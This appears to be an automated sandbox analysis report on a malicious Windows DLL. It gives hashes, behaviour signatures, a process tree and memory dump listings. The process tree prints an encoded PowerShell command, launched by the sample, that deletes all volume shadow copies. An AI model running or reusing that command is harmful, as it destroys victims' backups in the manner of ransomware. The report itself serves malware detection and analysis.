Analysis

  • max time kernel
    119s
  • max time network
    136s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    24-01-2022 00:44

General

  • Target

    f060508128cec81900681d00dcb87346d3f30c883b7a1cd657b93564963462ff.dll

  • Size

    116KB

  • MD5

    fa5a352ea598827d7249f6929bad286c

  • SHA1

    cf9bbb956577e5fc2e48d5ec29771741c73888cb

  • SHA256

    f060508128cec81900681d00dcb87346d3f30c883b7a1cd657b93564963462ff

  • SHA512

    9915d5196c8a6931b9fd22aae96f8aa76c46492c0e81b15836afefef74e54760d952619f5629116ef3da599b4355885be5a77fc81bd8065d688292f239a01c69

Score
6/10

Malware Config

Signatures

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 11 IoCs

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\f060508128cec81900681d00dcb87346d3f30c883b7a1cd657b93564963462ff.dll,#1
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1648
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\f060508128cec81900681d00dcb87346d3f30c883b7a1cd657b93564963462ff.dll,#1
      2⤵
      • Enumerates connected drives
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:316
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:268
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:804
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1824

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/268-55-0x000007FEFC441000-0x000007FEFC443000-memory.dmp
      Filesize

      8KB

    • memory/268-57-0x0000000002870000-0x0000000002872000-memory.dmp
      Filesize

      8KB

    • memory/268-58-0x0000000002872000-0x0000000002874000-memory.dmp
      Filesize

      8KB

    • memory/268-59-0x0000000002874000-0x0000000002877000-memory.dmp
      Filesize

      12KB

    • memory/268-56-0x000007FEF3630000-0x000007FEF418D000-memory.dmp
      Filesize

      11.4MB

    • memory/268-60-0x000000000287B000-0x000000000289A000-memory.dmp
      Filesize

      124KB

    • memory/316-54-0x0000000076001000-0x0000000076003000-memory.dmp
      Filesize

      8KB